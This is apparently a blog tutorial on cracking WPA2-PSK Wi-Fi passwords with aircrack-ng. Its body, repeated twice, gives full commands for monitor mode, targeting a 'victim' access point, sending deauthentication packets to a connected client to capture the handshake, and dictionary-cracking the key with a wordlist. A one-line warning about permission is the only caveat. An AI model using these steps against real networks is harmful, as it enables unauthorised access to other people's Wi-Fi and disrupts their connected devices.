In this tutorial we will learn to hack WPA2-PSK Password. Today most of the access point use Wi-Fi Protected Access II with a pre-shared key for security known as WPA2-PSK.
WPA2-PSK uses a 4-way handshake to share encrypted password to authenticate users. If we grab that encrypted password then after we can try to decrypt that later.
1. Put the wifi adapter in monitor mode.
Open the terminal and type "airmon-ng start wlan0". This will turn your wifi adapter in monitor mode. Wlan0 is the name of my wifi adapter. If you want to see yours type "ifconfig" in your terminal and press enter.
Now type "airmon-ng check kill" and press enter.
2. To find available access points in range.
Now we have to find all the access points available currently in our range. This will help us to gather information about our victim. To do that we have to type "airodump-ng wlan0mon" and press enter.
3. Select our target access point to capture the Handshake.
As we discussed earlier WPA2-PSK uses 4-way handshake. In this step we have to select our target to capture the handshake. Which we may want to decrypt later. Hence type "airodump-ng --bssid <bssid of AP> --channel <channel no. of AP> --write <handshake file name> wlan0mon"
eg:- airodump-ng --bssid 00:EC:0A:3F:C9:67 --channel 1 --write handshake wlan0mon
4. Send deauthentication packetc to client.
In this step we have to send some deauthentication packets to clients connected to our victim AP. So that if it tries to connect we can capture the 4-way handshake to decrypt that. We type in a new terminal aireplay-ng --deauth <No. of packets to send> -a <BSSID of AP> -c <BSSID of client> wlan0mon.
eg:- "aireplay-ng --deauth 5 -a 00:EC:0A:3F:C9:67 -c CC:9F:7A:81:81:19 wlan0mon"
and wait for message "WPA handshake".
5. Now the Cracking Part.
In this step we use aircrack-ng to crack the password by using a dictionary file. For this attack to get success the password must be there in wordlist file. we can find few wordlist in our kali linux (like rockyou.txt). I have created my own wordlist and use the same.
We type the following command.
"aircrack-ng -w <wordlist file> <captured handshake>"
eg:- aircrack-ng -w './wordlist.txt' './handshake.cap'
Now cracking part starts and we get the password, if it is present in the wordlist.
Yes! We got the password. Now we put the adapter back to managed mode by typing "airmon-ng stop wlan0mon". And we are ready to connect to the wifi again.
Don't use this on others wifi or at which you don't have permissions to do. Remember "A HUG is always better than HANDSHAKES".
Thanks for reading. Enjoy Hacking.
WPA2-PSK uses a 4-way handshake to share encrypted password to authenticate users. If we grab that encrypted password then after we can try to decrypt that later.
1. Put the wifi adapter in monitor mode.
Open the terminal and type "airmon-ng start wlan0". This will turn your wifi adapter in monitor mode. Wlan0 is the name of my wifi adapter. If you want to see yours type "ifconfig" in your terminal and press enter.
2. To find available access points in range.
Now we have to find all the access points available currently in our range. This will help us to gather information about our victim. To do that we have to type "airodump-ng wlan0mon" and press enter.
3. Select our target access point to capture the Handshake.
As we discussed earlier WPA2-PSK uses 4-way handshake. In this step we have to select our target to capture the handshake. Which we may want to decrypt later. Hence type "airodump-ng --bssid <bssid of AP> --channel <channel no. of AP> --write <handshake file name> wlan0mon"
eg:- airodump-ng --bssid 00:EC:0A:3F:C9:67 --channel 1 --write handshake wlan0mon
4. Send deauthentication packetc to client.
In this step we have to send some deauthentication packets to clients connected to our victim AP. So that if it tries to connect we can capture the 4-way handshake to decrypt that. We type in a new terminal aireplay-ng --deauth <No. of packets to send> -a <BSSID of AP> -c <BSSID of client> wlan0mon.
eg:- "aireplay-ng --deauth 5 -a 00:EC:0A:3F:C9:67 -c CC:9F:7A:81:81:19 wlan0mon"
5. Now the Cracking Part.
In this step we use aircrack-ng to crack the password by using a dictionary file. For this attack to get success the password must be there in wordlist file. we can find few wordlist in our kali linux (like rockyou.txt). I have created my own wordlist and use the same.
We type the following command.
"aircrack-ng -w <wordlist file> <captured handshake>"
eg:- aircrack-ng -w './wordlist.txt' './handshake.cap'
Now cracking part starts and we get the password, if it is present in the wordlist.
Yes! We got the password. Now we put the adapter back to managed mode by typing "airmon-ng stop wlan0mon". And we are ready to connect to the wifi again.
Don't use this on others wifi or at which you don't have permissions to do. Remember "A HUG is always better than HANDSHAKES".
Thanks for reading. Enjoy Hacking.
No comments:
Post a Comment